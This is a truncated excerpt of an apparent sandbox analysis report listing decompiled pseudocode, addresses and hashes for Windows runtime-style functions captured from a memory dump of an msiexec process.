                              0x04dbfed9
                              0x04dbfede
                              0x04dbfee0
                              0x04dbfeeb
                              0x04dbfef3
                              0x04dbfef6
                              0x04dbfef9
                              0x04dbff04
                              0x04dbff16
                              0x04dbff06
                              0x04dbff0f
                              0x04dbff0f
                              0x04dbff21
                              0x04dbff22
                              0x04dbff24
                              0x04dbff29
                              0x04dbff3e

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0b16548f80787f5797a96ab78bf0792e853cb9f9a297150b9c8d3fa478dd1f45
                              • Instruction ID: 4ce3f59f993db97a1f6bd7e71f304b9e9dfc3243221701763ab48830e5dd05ca
                              • Opcode Fuzzy Hash: 0b16548f80787f5797a96ab78bf0792e853cb9f9a297150b9c8d3fa478dd1f45
                              • Instruction Fuzzy Hash: E6018871F00218ABDB14DBA9D845FAFB7B8EF44704F40406AF901EB390D974EA01C7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DBFE3F Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              C-Code - Quality: 59%
                              			E04DBFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4dfd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04D4FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                              0x04dbfe3f
                              0x04dbfe3f
                              0x04dbfe4e
                              0x04dbfe58
                              0x04dbfe5d
                              0x04dbfe5f
                              0x04dbfe6a
                              0x04dbfe72
                              0x04dbfe75
                              0x04dbfe78
                              0x04dbfe83
                              0x04dbfe95
                              0x04dbfe85
                              0x04dbfe8e
                              0x04dbfe8e
                              0x04dbfea0
                              0x04dbfea1
                              0x04dbfea3
                              0x04dbfea8
                              0x04dbfebd

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9047807f6f873bdd365a50d74fb137033d67c4d362abfb87f8066c60b610bae3
                              • Instruction ID: 73f83171f7abaa4a0ecd33ca18a97588cd07aa2fbb1b9fd7e998ff24d4288757
                              • Opcode Fuzzy Hash: 9047807f6f873bdd365a50d74fb137033d67c4d362abfb87f8066c60b610bae3
                              • Instruction Fuzzy Hash: BD018471F00218ABDB14DFA9D846FAEB7B8EF84704F00406AF901EB391DA74E901C7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD1074 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04DD1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04DD165E(__ebx, 0x4df8ae4, (__edx -  *0x4df8b04 >> 0x14) + (__edx -  *0x4df8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4df8b04 >> 0x14) + (__edx -  *0x4df8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04DCAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04D27D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04DBFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                              0x04dd1074
                              0x04dd1080
                              0x04dd1082
                              0x04dd108a
                              0x04dd108f
                              0x04dd1093
                              0x04dd10ab
                              0x04dd10ab
                              0x04dd10c3
                              0x04dd10cf
                              0x04dd10e1
                              0x04dd10d1
                              0x04dd10da
                              0x04dd10da
                              0x04dd10e9
                              0x04dd10f5
                              0x04dd10f5
                              0x04dd10fe

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8ba974baf75511c106cd6ced8db7bea6abdd597762f246f6e82c719d5a7df677
                              • Instruction ID: 6364620134d9e05a9d43894e73967deffff5c3bb5ac14c8286a9f51f22dabdf8
                              • Opcode Fuzzy Hash: 8ba974baf75511c106cd6ced8db7bea6abdd597762f246f6e82c719d5a7df677
                              • Instruction Fuzzy Hash: 0701F1727047429BD721EB68C900B2A77E5FB84318F048629F88683290EE30F840CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D1B02A Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D1B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04D27D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04D87016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                              0x04d1b037
                              0x04d1b039
                              0x04d1b03b
                              0x04d1b040
                              0x04d6a60e
                              0x00000000
                              0x00000000
                              0x04d6a61d
                              0x04d1b04b
                              0x04d1b04e
                              0x04d6a627
                              0x04d6a634
                              0x00000000
                              0x00000000
                              0x04d6a641
                              0x04d6a653
                              0x04d6a643
                              0x04d6a64c
                              0x04d6a64c
                              0x04d6a65b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d6a66c
                              0x04d1b057
                              0x04d1b057
                              0x04d1b057
                              0x04d1b046
                              0x04d1b046
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                              • Instruction ID: af8105e308199fb1e983a7edec3ea668a774f8de8b755e2922bbe9dc7f98ca52
                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                              • Instruction Fuzzy Hash: 20018F32300980EFD322CB5CD988F7677E8FB46754F0900A2F95ACBA61E668FC40C620
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD8ED6 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              C-Code - Quality: 54%
                              			E04DD8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4dfd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04D27D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                              0x04dd8ed6
                              0x04dd8ee5
                              0x04dd8eed
                              0x04dd8ef0
                              0x04dd8efa
                              0x04dd8f03
                              0x04dd8f0c
                              0x04dd8f15
                              0x04dd8f24
                              0x04dd8f27
                              0x04dd8f31
                              0x04dd8f43
                              0x04dd8f33
                              0x04dd8f3c
                              0x04dd8f3c
                              0x04dd8f4e
                              0x04dd8f4f
                              0x04dd8f51
                              0x04dd8f56
                              0x04dd8f69

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f4b633eb7e8d2a9fd074bf72bfe490db9fd23e45b0b1f35b0b1673a1fbbbf97
                              • Instruction ID: 1738a0b71951048d9361b3299b589367528195e319b646a89166d829126dd7da
                              • Opcode Fuzzy Hash: 6f4b633eb7e8d2a9fd074bf72bfe490db9fd23e45b0b1f35b0b1673a1fbbbf97
                              • Instruction Fuzzy Hash: 04111E70E002199FDB04DFA9D541BAEB7F4FF08304F0442AAE519EB782E634E940DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD8A62 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              C-Code - Quality: 54%
                              			E04DD8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4dfd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                              0x04dd8a62
                              0x04dd8a71
                              0x04dd8a79
                              0x04dd8a82
                              0x04dd8a85
                              0x04dd8a89
                              0x04dd8a8c
                              0x04dd8a8f
                              0x04dd8a92
                              0x04dd8a95
                              0x04dd8a9f
                              0x04dd8ab1
                              0x04dd8aa1
                              0x04dd8aaa
                              0x04dd8aaa
                              0x04dd8abc
                              0x04dd8abd
                              0x04dd8abf
                              0x04dd8ac4
                              0x04dd8ada

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 91cb0e2d44934aa99fbc4cee4f2d35eb91bf40d2cdd1b408ba3ec7e62d8b1321
                              • Instruction ID: 1a104a08f9fbc1141956685309a739a6dbfa1a17e79d1d4c753faae47ec068e0
                              • Opcode Fuzzy Hash: 91cb0e2d44934aa99fbc4cee4f2d35eb91bf40d2cdd1b408ba3ec7e62d8b1321
                              • Instruction Fuzzy Hash: CA012CB1A0021CAFDB00DFA9D941AAEB7B8FF48314F10405AF905F7341E634B900CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0DB60 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D0DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04D0DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04D0E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04D0E8B0(__ecx, _t14, 0xfff);
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                              0x04d0db64
                              0x04d0db66
                              0x04d0db6b
                              0x04d0dbaa
                              0x04d0db71
                              0x04d0db76
                              0x04d0db7a
                              0x04d0dba3
                              0x04d0db7c
                              0x04d0db87
                              0x04d0db8b
                              0x04d64fa1
                              0x04d64fb3
                              0x04d64fb8
                              0x04d0db91
                              0x04d0db96
                              0x04d0db98
                              0x04d0db98
                              0x04d0db8b
                              0x04d0db7a
                              0x04d0db9d
                              0x04d0dba2

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                              • Instruction ID: 1e7f73fede562819d6f7235abb138a848167f866aa7879a304032e11986d86bc
                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                              • Instruction Fuzzy Hash: 61F068333415229BE7726AD98880B57A6A6DFD1A64F154437F1059B2C4C970EC0296E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0B1E1 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D0B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04D27D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04D27D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04D87016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                              0x04d0b1e8
                              0x04d0b1ea
                              0x04d0b1f3
                              0x04d64a17
                              0x04d0b1f9
                              0x04d0b1f9
                              0x04d0b1f9
                              0x04d0b201
                              0x04d64a21
                              0x04d64a2e
                              0x00000000
                              0x00000000
                              0x04d64a3b
                              0x04d64a4d
                              0x04d64a3d
                              0x04d64a46
                              0x04d64a46
                              0x04d64a55
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d0b20a
                              0x04d0b20a
                              0x04d0b20a
                              0x04d0b20a

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                              • Instruction ID: d5011c76fe037fa4fff02697e5f582e8bdedfa8e376cea3b00df49ea85f6dea6
                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                              • Instruction Fuzzy Hash: 06018132344680EBD32297A9C904F6A7B99FF51758F0940A2F9558B6B2E679F800D229
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D9FE87 Relevance: .0, Instructions: 38COMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E04D9FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4dfd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04D27D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                              0x04d9fe96
                              0x04d9fe9e
                              0x04d9fea1
                              0x04d9fead
                              0x04d9feb3
                              0x04d9feb9
                              0x04d9fec3
                              0x04d9fed5
                              0x04d9fec5
                              0x04d9fece
                              0x04d9fece
                              0x04d9fee0
                              0x04d9fee1
                              0x04d9fee3
                              0x04d9fee8
                              0x04d9fefb

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3b3d57549a62481779ced451b1b2b90cab9be3344c4032c3315ac22659914018
                              • Instruction ID: 419e9b3bfc2724417d41db92481fe4e4054199fb68221db7f555fa79878f1a69
                              • Opcode Fuzzy Hash: 3b3d57549a62481779ced451b1b2b90cab9be3344c4032c3315ac22659914018
                              • Instruction Fuzzy Hash: 6B011270A00209EFDB14DFA8D556A6EB7F4FF04304F544199A555EB382D635ED01CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD8F6A Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              C-Code - Quality: 48%
                              			E04DD8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4dfd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                              0x04dd8f6a
                              0x04dd8f79
                              0x04dd8f81
                              0x04dd8f84
                              0x04dd8f8b
                              0x04dd8f91
                              0x04dd8f94
                              0x04dd8f9e
                              0x04dd8fb0
                              0x04dd8fa0
                              0x04dd8fa9
                              0x04dd8fa9
                              0x04dd8fbb
                              0x04dd8fbc
                              0x04dd8fbe
                              0x04dd8fc3
                              0x04dd8fd6

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8c013f30342360fe3dd7baec8d336fba23805812b2463af710745651d83c7ff
                              • Instruction ID: cb6c9db927a4b19bcb00a87aa22c38caaeab53ad493865ba8def14e1023e53d5
                              • Opcode Fuzzy Hash: c8c013f30342360fe3dd7baec8d336fba23805812b2463af710745651d83c7ff
                              • Instruction Fuzzy Hash: 4E013C74A00208AFDB04EFB8D545AAEB7F4EF58304F50405AB915EB381EA74FA00DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DC131B Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              C-Code - Quality: 48%
                              			E04DC131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4dfd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                              0x04dc131b
                              0x04dc132a
                              0x04dc1330
                              0x04dc1336
                              0x04dc133e
                              0x04dc1341
                              0x04dc1344
                              0x04dc134f
                              0x04dc1361
                              0x04dc1351
                              0x04dc135a
                              0x04dc135a
                              0x04dc136c
                              0x04dc136d
                              0x04dc136f
                              0x04dc1374
                              0x04dc1387

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 78e6256a72f9d2ceb9812498c61137c0ba2bbf62854e7cea1dc444b5edd16d4d
                              • Instruction ID: abd45bc86c38e3c5e6ad4251f796f0369284fb806383ac08155abb3b4530ecb1
                              • Opcode Fuzzy Hash: 78e6256a72f9d2ceb9812498c61137c0ba2bbf62854e7cea1dc444b5edd16d4d
                              • Instruction Fuzzy Hash: 44013C71A01218AFDB04EFA9D545AAEB7F4FF48704F40405AF945EB381E674EA00CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DC1608 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E04DC1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4dfd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04D27D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                              0x04dc1608
                              0x04dc1617
                              0x04dc161d
                              0x04dc1625
                              0x04dc1628
                              0x04dc162b
                              0x04dc1636
                              0x04dc1648
                              0x04dc1638
                              0x04dc1641
                              0x04dc1641
                              0x04dc1653
                              0x04dc1654
                              0x04dc1656
                              0x04dc165b
                              0x04dc166e

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b413d8b48e802be979cd21c1c68c9e08b3e40a9871acdf7d38ce8e38d0fdd7d
                              • Instruction ID: f957dd7014b47c163bc63e0818b2a0ab99f518bb5d641274aa52b53e23eccf5d
                              • Opcode Fuzzy Hash: 5b413d8b48e802be979cd21c1c68c9e08b3e40a9871acdf7d38ce8e38d0fdd7d
                              • Instruction Fuzzy Hash: 55F06271E00258EFDB14DFA9D505E6EB7F4EF54300F444059E905EB381E634E900CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D2C577 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D2C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
